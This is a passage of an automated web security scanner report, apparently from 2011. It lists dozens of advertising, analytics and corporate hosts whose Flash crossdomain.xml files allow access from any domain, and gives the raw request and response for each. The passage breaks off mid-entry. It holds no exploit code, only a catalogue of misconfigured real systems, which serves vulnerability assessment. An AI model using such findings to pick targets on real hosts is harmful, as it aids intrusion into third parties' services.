X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 79533

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.5. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 16:18:51 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.6. http://apps.sapha.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.sapha.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 13 Jun 2009 07:57:06 GMT
ETag: "d30807e-140-2bd11880"
Accept-Ranges: bytes
Content-Length: 320
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.7. http://apr.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apr.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: apr.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:52 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n20 ( lax-agg-n10), ms lax-agg-n10 ( origin>CONN)
ETag: "a35c9-83-4aad0437c9440"
Cache-Control: max-age=604800
Expires: Mon, 12 Sep 2011 02:30:52 GMT
Age: 0
Content-Length: 131
Content-Type: application/xml
Last-Modified: Thu, 18 Aug 2011 23:49:29 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.8. http://cache.specificmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:56 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n14 ( lax-agg-n43), ht-d lax-agg-n43.panthercdn.com
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 01:38:58 GMT
Age: 262318
Content-Length: 194
Content-Type: text/xml
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.9. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 05 Sep 2011 02:30:58 GMT
Date: Mon, 05 Sep 2011 02:30:58 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.10. http://ce.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:54 GMT
Server: PWS/1.7.3.3
X-Px: ht-d lax-agg-n55.panthercdn.com
ETag: "7955a-83-4aad025722640"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 13:20:56 GMT
Age: 220198
Content-Length: 131
Content-Type: application/xml
Last-Modified: Thu, 18 Aug 2011 23:41:05 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.11. http://dellinc.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dellinc.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sun, 04 Sep 2011 16:19:15 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.12. http://eas.apm.emediate.eu/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://eas.apm.emediate.eu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: eas.apm.emediate.eu

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:58 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Tue, 16 Mar 2010 12:17:57 GMT
ETag: "143-481e9fce3e740"
Accept-Ranges: bytes
Content-Length: 323
Cache-Control: max-age=0
Expires: Mon, 05 Sep 2011 01:54:58 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.13. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:32:04 GMT
Expires: Fri, 02 Sep 2011 23:18:02 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 75163
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.14. https://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:56:51 GMT
Expires: Sun, 04 Sep 2011 23:56:51 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 76846

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.15. http://gacela.eu/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gacela.eu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gacela.eu

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:55:03 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 13:45:59 GMT
ETag: "c1bd87-d1-4ab40884013c0"
Accept-Ranges: bytes
Content-Length: 209
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

4.16. http://h41174.www4.hp.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h41174.www4.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: h41174.www4.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:41:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "66b4b7-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.17. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 16:19:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Sat, 03-Sep-2016 16:19:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.18. http://img-cdn.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 16:19:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.19. http://m.webtrends.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:a1b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:23:11 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.20. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:13:43 GMT
Server: Apache/2.2.4 (Unix)
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 202
Keep-Alive: timeout=5, max=19943
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.21. http://met1.hp.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://met1.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: met1.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: Omniture DC/2.0.0
xserver: www606
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.22. http://metrics.skype.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.skype.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:13 GMT
Server: Omniture DC/2.0.0
xserver: www385
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.23. http://microsoftsto.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://microsoftsto.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: microsoftsto.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:23:13 GMT
Server: Omniture DC/2.0.0
xserver: www376
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.24. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 04 Sep 2011 16:18:34 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.25. http://nsm.dell.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nsm.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nsm.dell.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:16 GMT
Server: Omniture DC/2.0.0
xserver: www38
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.26. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:13:42 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:35:44 GMT
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

4.27. http://pixel.adsafeprotected.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Mon, 05 Sep 2011 02:30:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.28. http://pixel.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca1 3233
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.29. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 21:13:41 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 21:13:41 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.30. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 16:19:50 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 16:19:50 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.31. http://statse.webtrendslive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:6eb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:19:04 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.32. http://sync.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca8 3240
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.33. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "38a03db-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

4.34. http://vap1den1.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap1den1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap1den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 22:27:30 GMT
ETag: "1881cb-83-4aacf1e4a9880"
Accept-Ranges: bytes
Content-Length: 131
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.35. http://vap1iad1.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap1iad1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap1iad1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:05 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:41:26 GMT
ETag: "baf2a-83-4aad026b29580"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.36. http://vap1iad2.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap1iad2.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

